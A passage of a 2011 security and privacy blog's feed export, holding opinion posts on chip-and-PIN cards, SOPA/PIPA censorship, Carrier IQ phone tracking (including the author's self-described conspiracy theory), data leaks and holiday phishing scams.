The technology is becoming more mainstream and now there's even an &lt;a href="https://www.izettle.com/how-it-works/in-short/" target="_blank"&gt;iPhone/iPad app + device&lt;/a&gt; available for it.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Recently I decided to call my credit card companies and request an updated, more secure credit card. I specifically requested that they provide me with a card without RFID (wave-pay) that incorporated chip and PIN technology. My excuse was that I expected to travel to Europe (where swipe and sign is no longer accepted) next year; in all honesty, though, I just wanted to see what they'd say. To my surprise, both companies (Visa from my local bank and American Express) denied my request, stating that they did not have this technology available to US customers. This is pretty disappointing and actually somewhat scary: my fear is that by the time this technology is deployed in the US, it will already be obsolete, cracked and easily circumvented. 
In fact, a simple Google search reveals very &lt;a href="http://www.smartcardex.com/html_products/SmartBox-22.html" target="_blank"&gt;interesting new devices&lt;/a&gt; which could prove extremely useful to tech-savvy criminals aiming to stay ahead of the curve...&amp;nbsp;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-8yYUJ6xVTtg/Tv_s6EFmZ4I/AAAAAAAAAE8/AL10fuYmU-w/s1600/smartcard.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="258" src="http://4.bp.blogspot.com/-8yYUJ6xVTtg/Tv_s6EFmZ4I/AAAAAAAAAE8/AL10fuYmU-w/s400/smartcard.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3489213761668248259-1733855958956819904?l=paranoid-security.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://paranoid-security.blogspot.com/feeds/1733855958956819904/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://paranoid-security.blogspot.com/2011/12/give-credit.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/1733855958956819904'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/1733855958956819904'/><link rel='alternate' type='text/html' href='http://paranoid-security.blogspot.com/2011/12/give-credit.html' title='Give Credit'/><author><name>Daniel Ayoub, CISSP</name><uri>http://www.blogger.com/profile/00267229057879129601</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://4.bp.blogspot.com/-k3f9JL-SyNk/TpD-umbH7kI/AAAAAAAAAAU/Fy5R67lsfMA/s220/network-security-lock.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-wgfrj6eOS74/Tv_r2rHiDmI/AAAAAAAAAEk/JPhbq53E6XE/s72-c/psn-credit-card-hack1.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3489213761668248259.post-7003076482519769367</id><published>2011-12-22T14:14:00.000-08:00</published><updated>2011-12-22T14:17:50.419-08:00</updated><title type='text'>[CENSORED]</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: left;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-JuriJv61Hc0/TvOsfxURiQI/AAAAAAAAAEM/XvA3JQQYVF8/s1600/Censored-in-America.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="270" src="http://4.bp.blogspot.com/-JuriJv61Hc0/TvOsfxURiQI/AAAAAAAAAEM/XvA3JQQYVF8/s400/Censored-in-America.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;Over the last week or so there have been &lt;a href="http://www.washingtonpost.com/business/economy/sopa-hearings-cast-debate-as-old-media-vs-new-media/2011/12/16/gIQAmCD3yO_story.html" target="_blank"&gt;numerous &lt;/a&gt;stories related to the pending 'piracy prevention'&amp;nbsp;bills currently before Congress. For those of you who are not familiar: SOPA is the 'Stop Online Piracy Act' and PIPA is the 'Protect IP Act.' At first glance these bills may sound perfectly logical and acceptable: I mean, piracy is, after all, stealing. 
The problem, however, is that the content proposed in these bills is more about &lt;a href="http://www.canadianbusiness.com/article/63233--sopa-theft-and-the-new-cold-war" target="_blank"&gt;censorship of the internet&lt;/a&gt; than about protecting intellectual property rights. Further, because these bills allow for censorship they &lt;a href="http://www.stanfordlawreview.org/online/dont-break-internet" target="_blank"&gt;violate the First Amendment&lt;/a&gt; and are therefore unconstitutional.&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;The gist of the proposed laws is that if the owner of a piece of content (movie/record company) were to discover a website hosting a pirated copy of their content (movie/mp3), the content owner would have the authority (without any legal oversight) to remove the URL from DNS listings. SOPA in particular would make it a &lt;a href="http://www.opencongress.org/bill/112-s978/" target="_blank"&gt;felony to stream&lt;/a&gt; pirated content online or &lt;a href="http://boingboing.net/2011/12/22/sopa-bans-tor-the-us-navys.html" target="_blank"&gt;use applications&lt;/a&gt; such as &lt;a href="https://www.torproject.org/" target="_blank"&gt;TOR &lt;/a&gt;to circumvent the blockade. Civil liberties aside, the problem with these bills is that they create a vehicle by which censorship of the internet in the United States becomes extremely easy.&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;It will be interesting to see if these bills are discussed as part of the upcoming presidential campaign debates as they present a tough position for any politician regardless of which side they're on. 
The good news however is that these stories do appear to be getting some attention, in part due to&lt;a href="http://www.popularmechanics.com/science/mythbusters/articles/mythbuster-adam-savage-sopa-could-destroy-the-internet-as-we-know-it-6620300" target="_blank"&gt; public criticism &lt;/a&gt;on the part of various &lt;a href="http://www.techdirt.com/articles/20111222/00263617166/hollywood-star-ashton-kutcher-says-sopa-is-problem-not-solution.shtml" target="_blank"&gt;celebrities&lt;/a&gt;. Also, tech giants like &lt;a href="http://www.washingtonpost.com/business/economy/sopa-hearings-cast-debate-as-old-media-vs-new-media/2011/12/16/gIQAmCD3yO_story.html" target="_blank"&gt;Google, Wikipedia &amp;amp; Facebook&lt;/a&gt; have been very active in fighting the good fight against these bills. Do your part - educate people about these bills - the more public attention and controversy surrounding these bills, the less likely they are to get passed.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-92iAMkg0jkk/TvOrg5nUwSI/AAAAAAAAADo/tdLuCgmojmM/s1600/120310censorship.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-92iAMkg0jkk/TvOrg5nUwSI/AAAAAAAAADo/tdLuCgmojmM/s1600/120310censorship.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3489213761668248259-7003076482519769367?l=paranoid-security.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://paranoid-security.blogspot.com/feeds/7003076482519769367/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://paranoid-security.blogspot.com/2011/12/censored.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' 
href='http://www.blogger.com/feeds/3489213761668248259/posts/default/7003076482519769367'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/7003076482519769367'/><link rel='alternate' type='text/html' href='http://paranoid-security.blogspot.com/2011/12/censored.html' title='[CENSORED]'/><author><name>Daniel Ayoub, CISSP</name><uri>http://www.blogger.com/profile/00267229057879129601</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/-k3f9JL-SyNk/TpD-umbH7kI/AAAAAAAAAAU/Fy5R67lsfMA/s220/network-security-lock.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-JuriJv61Hc0/TvOsfxURiQI/AAAAAAAAAEM/XvA3JQQYVF8/s72-c/Censored-in-America.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3489213761668248259.post-2361579404193654120</id><published>2011-12-12T17:42:00.000-08:00</published><updated>2011-12-12T17:54:29.420-08:00</updated><title type='text'>Living in America</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-YT2semMpBa8/Tuas8UCcFRI/AAAAAAAAADU/CUA3rCdJHKc/s1600/FOIA.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;/a&gt;&lt;/div&gt;&lt;a href="http://3.bp.blogspot.com/-TQJU7TlugAw/Tuas7PrPEbI/AAAAAAAAADM/Kav1HrN7bHY/s1600/1984.jpeg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-TQJU7TlugAw/Tuas7PrPEbI/AAAAAAAAADM/Kav1HrN7bHY/s1600/1984.jpeg" /&gt;&lt;/a&gt; &lt;br /&gt;Well, that didn't take very long.. Turns out my 'conspiracy theory' was dead on- guess that means I'm not as loony as originally thought. 
The folks over at &lt;a href="http://www.muckrock.com/news/archives/2011/dec/12/fbi-carrier-iq-files-used-law-enforcement-purposes/" target="_blank"&gt;MuckRock.com&lt;/a&gt; filed a Freedom of Information Act request regarding Carrier IQ and received an interesting response from the FBI. Turns out the FBI doesn't want to comply with the federal law and has &lt;a href="http://s3.documentcloud.org/documents/273602/rejection-letter.pdf" target="_blank"&gt;refused to supply the requested information&lt;/a&gt; on grounds that it could &lt;a href="http://www.forbes.com/sites/andygreenberg/2011/12/12/fbi-says-carrieriq-may-be-used-in-law-enforcement-proceedings/" target="_blank"&gt;disrupt investigations&lt;/a&gt; they've currently got in progress.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-YT2semMpBa8/Tuas8UCcFRI/AAAAAAAAADU/CUA3rCdJHKc/s1600/FOIA.gif" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="290" src="http://2.bp.blogspot.com/-YT2semMpBa8/Tuas8UCcFRI/AAAAAAAAADU/CUA3rCdJHKc/s400/FOIA.gif" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;Sometimes being right feels good; sometimes it's a little sad. In this instance it's hard to feel good about being right. What's going on, America? The feds are stealing your personal privacy and no one is standing up to stop them. Now don't get me wrong, I'm all for LE being afforded every resource necessary to catch bad guys and terrorists.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;I do however take issue when they do it at the expense of our &lt;a href="http://en.wikipedia.org/wiki/Civil_liberties" target="_blank"&gt;civil liberties&lt;/a&gt;. 
Search warrants were created for a reason- using techniques such as this is just a way around the law.&lt;br /&gt;&lt;br /&gt;2012 is an election year, yet somehow I doubt that issues like this will ever be raised. I mean, how can they be when there are so many '&lt;a href="http://uselectionnews.org/category/2012-issues/" target="_blank"&gt;important&lt;/a&gt;' issues already on the table? Wake up people!&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-DIX5XOPbWO8/Tuas94YH-bI/AAAAAAAAADc/O0jnismTJ4Q/s1600/DESAbigbrother.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="640" src="http://3.bp.blogspot.com/-DIX5XOPbWO8/Tuas94YH-bI/AAAAAAAAADc/O0jnismTJ4Q/s640/DESAbigbrother.jpg" width="478" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3489213761668248259-2361579404193654120?l=paranoid-security.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://paranoid-security.blogspot.com/feeds/2361579404193654120/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://paranoid-security.blogspot.com/2011/12/living-in-america.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/2361579404193654120'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/2361579404193654120'/><link rel='alternate' type='text/html' href='http://paranoid-security.blogspot.com/2011/12/living-in-america.html' title='Living in America'/><author><name>Daniel Ayoub, CISSP</name><uri>http://www.blogger.com/profile/00267229057879129601</uri><email>noreply@blogger.com</email><gd:image 
rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/-k3f9JL-SyNk/TpD-umbH7kI/AAAAAAAAAAU/Fy5R67lsfMA/s220/network-security-lock.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-TQJU7TlugAw/Tuas7PrPEbI/AAAAAAAAADM/Kav1HrN7bHY/s72-c/1984.jpeg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3489213761668248259.post-2307671796928377023</id><published>2011-12-09T09:45:00.001-08:00</published><updated>2011-12-09T09:45:58.278-08:00</updated><title type='text'>It could happen to you..</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;object width="320" height="266" class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://0.gvt0.com/vi/NYHKjoamLiw/0.jpg"&gt;&lt;param name="movie" value="http://www.youtube.com/v/NYHKjoamLiw&amp;fs=1&amp;source=uds" /&gt;&lt;param name="bgcolor" value="#FFFFFF" /&gt;&lt;embed width="320" height="266"  src="http://www.youtube.com/v/NYHKjoamLiw&amp;fs=1&amp;source=uds" type="application/x-shockwave-flash"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3489213761668248259-2307671796928377023?l=paranoid-security.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://paranoid-security.blogspot.com/feeds/2307671796928377023/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://paranoid-security.blogspot.com/2011/12/it-could-happen-to-you.html#comment-form' title='0 Comments'/><link rel='edit' 
type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/2307671796928377023'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/2307671796928377023'/><link rel='alternate' type='text/html' href='http://paranoid-security.blogspot.com/2011/12/it-could-happen-to-you.html' title='It could happen to you..'/><author><name>Daniel Ayoub, CISSP</name><uri>http://www.blogger.com/profile/00267229057879129601</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/-k3f9JL-SyNk/TpD-umbH7kI/AAAAAAAAAAU/Fy5R67lsfMA/s220/network-security-lock.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3489213761668248259.post-9038419746794964152</id><published>2011-12-06T21:26:00.001-08:00</published><updated>2011-12-06T22:29:28.656-08:00</updated><title type='text'>Conspiracy Theory</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-E6YBpSNsjqU/Tt77XFUZkhI/AAAAAAAAADE/iY0-H9AIHQw/s1600/carrier-iq-privacy.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="190" src="http://1.bp.blogspot.com/-E6YBpSNsjqU/Tt77XFUZkhI/AAAAAAAAADE/iY0-H9AIHQw/s320/carrier-iq-privacy.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;So by now I'm sure everyone is aware of the Carrier IQ scandal that broke last week. 
In case you've been living &lt;a href="https://www.google.com/#q=carrier+iq&amp;amp;hl=en&amp;amp;safe=off&amp;amp;prmd=imvnsu&amp;amp;source=univ&amp;amp;tbm=nws&amp;amp;tbo=u&amp;amp;sa=X&amp;amp;ei=gvreTpGqL5SNigLX1OjuCA&amp;amp;sqi=2&amp;amp;ved=0CEgQqAI&amp;amp;bav=on.2,or.r_gc.r_pw.,cf.osb&amp;amp;fp=bab13e12989211e2&amp;amp;biw=1042&amp;amp;bih=871" target="_blank"&gt;under a rock&lt;/a&gt; it turns out that several telcos have been spying on their customers by installing rootkits on smartphones. &lt;br /&gt;&lt;br /&gt;Now I'm seeing stories that the &lt;a href="http://franken.senate.gov/" target="_blank"&gt;great senator from Minnesota&lt;/a&gt; is causing a ruckus and demanding that the software manufacturer, handset makers and carriers all &lt;a href="http://www.wired.com/threatlevel/2011/12/carrier-iq-franken/" target="_blank"&gt;come clean&lt;/a&gt; about their involvement. Personally I think this is nothing more than political theater; however, it is nice to finally see someone stand up for personal privacy. Unfortunately I don't think we're going to see a single conviction come out of this witch hunt.&lt;br /&gt;&lt;br /&gt;At the risk of sounding like a total nut-job I'd like to propose a theory: Carrier IQ was a federally sanctioned operation under the &lt;a href="http://en.wikipedia.org/wiki/Patriot_act" target="_blank"&gt;PATRIOT Act&lt;/a&gt;. The Department of Homeland Security (or any one of numerous other federal agencies)&amp;nbsp; enlisted the help of internet service providers and telcos so that they could keep tabs on communication networks; Carrier IQ is how they did it.&lt;br /&gt;&lt;br /&gt;Now before you go writing me off as a loon, think about it for a minute. 
We know for a fact that DHS has &lt;a href="http://www.bloomberg.com/news/2011-09-21/internet-providers-asked-by-u-s-to-set-virus-defense-standards.html" target="_blank"&gt;requested ISPs' help&lt;/a&gt; in the past for tracking down botnets and stopping the spread of malware. We also know that the &lt;a href="http://www.wired.com/threatlevel/2011/11/feds-fake-cell-phone-tower/" target="_blank"&gt;FBI worked with wireless carriers&lt;/a&gt; to monitor network traffic sent through their towers. Why then would it be so hard to believe that Carrier IQ is nothing more than a secret program never intended to be disclosed to the public? After all, we didn't find out about it from the telcos, handset manufacturers or software companies but from a &lt;a href="http://www.youtube.com/watch?v=T17XQI_AYNo" target="_blank"&gt;lowly security researcher&lt;/a&gt; who initially thought it was a piece of malware.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;I believe this whole mess is a government program gone wrong. The only way we'll know for sure though is if any convictions get handed down. I expect we'll see plenty more of the political drama in the press and on TV (politicians love headlines). 
However if no one gets convicted, it's because they had a get out of jail free card signed by the feds.&lt;/div&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-CtC0CbplNqg/Tt76VcBXXbI/AAAAAAAAAC8/LVw-FXTYHlo/s1600/conspiracy.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="300" src="http://4.bp.blogspot.com/-CtC0CbplNqg/Tt76VcBXXbI/AAAAAAAAAC8/LVw-FXTYHlo/s400/conspiracy.jpg" width="400" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;(Me on the weekends)&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3489213761668248259-9038419746794964152?l=paranoid-security.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://paranoid-security.blogspot.com/feeds/9038419746794964152/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://paranoid-security.blogspot.com/2011/12/conspiracy-theory.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/9038419746794964152'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/9038419746794964152'/><link rel='alternate' type='text/html' href='http://paranoid-security.blogspot.com/2011/12/conspiracy-theory.html' title='Conspiracy Theory'/><author><name>Daniel Ayoub, CISSP</name><uri>http://www.blogger.com/profile/00267229057879129601</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://4.bp.blogspot.com/-k3f9JL-SyNk/TpD-umbH7kI/AAAAAAAAAAU/Fy5R67lsfMA/s220/network-security-lock.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-E6YBpSNsjqU/Tt77XFUZkhI/AAAAAAAAADE/iY0-H9AIHQw/s72-c/carrier-iq-privacy.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3489213761668248259.post-7931972210961806730</id><published>2011-12-01T13:55:00.001-08:00</published><updated>2011-12-01T16:00:37.693-08:00</updated><title type='text'>Leaky Pipes</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-rJso5IYOMLo/Ttf6cCldeGI/AAAAAAAAACs/rOB_Ny50Eq4/s1600/tumblr_kytqs0OZz31qamuds.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://4.bp.blogspot.com/-rJso5IYOMLo/Ttf6cCldeGI/AAAAAAAAACs/rOB_Ny50Eq4/s200/tumblr_kytqs0OZz31qamuds.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Lately I've been seeing an increasing number of reports around the idea that personal information is being leaked online. This does not surprise me as it's a well known fact that digital information is inherently insecure; what is surprising however is the blatant disregard for privacy on the part of the data owners.&lt;br /&gt;&lt;br /&gt;Take for example mobile phone carriers. It's no secret that ISPs (and mobile carriers) have been mining DNS queries from their users to sell to market research firms for years. It is surprising however that mobile carriers would &lt;a href="http://www.computerworld.com/s/article/9222319/AT_T_Sprint_confirm_use_of_Carrier_IQ_software_on_handsets" target="_blank"&gt;intentionally install rootkits&lt;/a&gt; onto their customers' phones in order to log data. 
This is an obvious invasion of privacy and I hope that AT&amp;amp;T + Sprint are raked over the coals for it; although I would settle for some form of vigilante justice in this case. (Anonymous to the rescue!)&lt;br /&gt;&lt;br /&gt;But that's not the half of it. Turns out that some &lt;a href="http://cyberlaw.stanford.edu/node/6740" target="_blank"&gt;researchers at Stanford&lt;/a&gt; have discovered that consumer websites (Wall Street Journal, NBC, HomeDepot to name a few) are all leaking users' information to marketing companies. I'd always been under the impression that this was illegal without disclosure; however, it seems that companies have found a loophole. In fact, according to a recent &lt;a href="http://www.wikileaks.org/The-Spyfiles" target="_blank"&gt;WikiLeaks article&lt;/a&gt;, this type of data mining is all too common. Corporations are looking to make money any way they can- morality comes later. Stories like this are great as they bring to light issues that would otherwise go unnoticed. Consumers need to be aware that these unethical tactics are being used regularly and &lt;a href="http://www.aclu.org/technology-and-liberty/internet-privacy" target="_blank"&gt;hold corporations responsible&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;So now you're so worried about privacy that you're bordering on paranoid schizophrenia. Well, be careful what you tell your shrink as that information may eventually wind up on the net too. Turns out that &lt;a href="http://www.networkworld.com/news/2011/120111-medical-data-breaches-soar-according-253640.html" target="_blank"&gt;medical data breaches&lt;/a&gt; have been on the rise lately- to the tune of 96% of providers surveyed reporting a breach in the last 2 years. Good thing doctors make us sign arbitration agreements.. 
I wonder if those cover data compromises?&lt;br /&gt;&lt;br /&gt;Someone call a plumber; the Internet is leaking.&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-pfvtTFo5Pm8/Ttf-bt0euoI/AAAAAAAAAC0/aNOhHGvp71Y/s1600/mario_and_luigi_by_luigil.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="333" src="http://4.bp.blogspot.com/-pfvtTFo5Pm8/Ttf-bt0euoI/AAAAAAAAAC0/aNOhHGvp71Y/s400/mario_and_luigi_by_luigil.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3489213761668248259-7931972210961806730?l=paranoid-security.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://paranoid-security.blogspot.com/feeds/7931972210961806730/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://paranoid-security.blogspot.com/2011/12/leaky-pipes.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/7931972210961806730'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3489213761668248259/posts/default/7931972210961806730'/><link rel='alternate' type='text/html' href='http://paranoid-security.blogspot.com/2011/12/leaky-pipes.html' title='Leaky Pipes'/><author><name>Daniel Ayoub, CISSP</name><uri>http://www.blogger.com/profile/00267229057879129601</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/-k3f9JL-SyNk/TpD-umbH7kI/AAAAAAAAAAU/Fy5R67lsfMA/s220/network-security-lock.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' 
url='http://4.bp.blogspot.com/-rJso5IYOMLo/Ttf6cCldeGI/AAAAAAAAACs/rOB_Ny50Eq4/s72-c/tumblr_kytqs0OZz31qamuds.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3489213761668248259.post-1572206456909907525</id><published>2011-11-27T10:05:00.001-08:00</published><updated>2011-11-28T20:59:36.674-08:00</updated><title type='text'>Buyer Beware</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-uXYqb-KyZ7I/TtKISDHrcGI/AAAAAAAAACU/XohBZjC2_48/s1600/Buyer-Beware2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="212" src="http://4.bp.blogspot.com/-uXYqb-KyZ7I/TtKISDHrcGI/AAAAAAAAACU/XohBZjC2_48/s320/Buyer-Beware2.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&amp;nbsp;Now that Black Friday has passed, Cyber Monday (week?) is upon us! I must admit, I was at some point tempted to buy useless junk that I did not need. After all, that's really what people do on these after-holiday shopping days.. Sure the stores tell us the shopping is for Christmas presents however in reality most people are likely buying things for themselves (would be interested to see an honest survey on this).&amp;nbsp; At any rate, the 'specials' this year (and last?) were not really all that special, basically just a small additional markdown on top of everyday prices- hardly enough incentive to get me out of bed early; I've already got a laptop and TV.&lt;br /&gt;&lt;br /&gt;Criminals have become savvy to these holidays and are &lt;a href="http://www.eweek.com/c/a/Security/Attackers-Gearing-Up-for-Cyber-Monday-With-Scams-Deals-477523/" target="_blank"&gt;poisoning search engines&lt;/a&gt; with malware filled sites that promise shoppers exclusive holiday deals. 
This scam has been around for a while; however, it is interesting to see the adaptation to current events / popular culture. After all, who can resist a $75 iPad?! Personally I think it's just a matter of time before cable news networks get a hold of these stories and begin their campaign of fear. That will solve &lt;i&gt;some&lt;/i&gt; of the problem; however, a few grandmothers are still likely to get caught up in it.&lt;br /&gt;&lt;br /&gt;As if that weren't enough, a new phishing scam has been making the rounds this year where people are sent an email claiming to be a &lt;a href="http://www.theregister.co.uk/2011/11/24/fake_itunes_gift_cert_malware/" target="_blank"&gt;$50 iTunes gift card&lt;/a&gt;. Once the unwitting victim opens the attachment, their system becomes infected and well, another one bites the dust.&amp;nbsp; Again, this is nothing new- phishing and malware infected attachments have been around for a very long time- everyone knows these things exist. People need to understand that just because it's the holidays does not mean they can let their guard down. Common sense still reigns supreme.&lt;br /&gt;&lt;br /&gt;So now the news media has convinced you that shopping online is no longer safe, so you decide to head off to the mall. Turns out that the mall has its own set of problems... While doing some holiday shopping in downtown London with her three children, a woman was confronted with a threat of a &lt;a href="http://www.surreycomet.co.uk/news/9384360.Mother_s_disgust_over_x_rated_iPorn/" target="_blank"&gt;different type&lt;/a&gt;. Turns out that the internet content filtering at the Currys department store wasn't up to par, resulting in the iPads on demo displaying hardcore porn for shoppers to enjoy. 
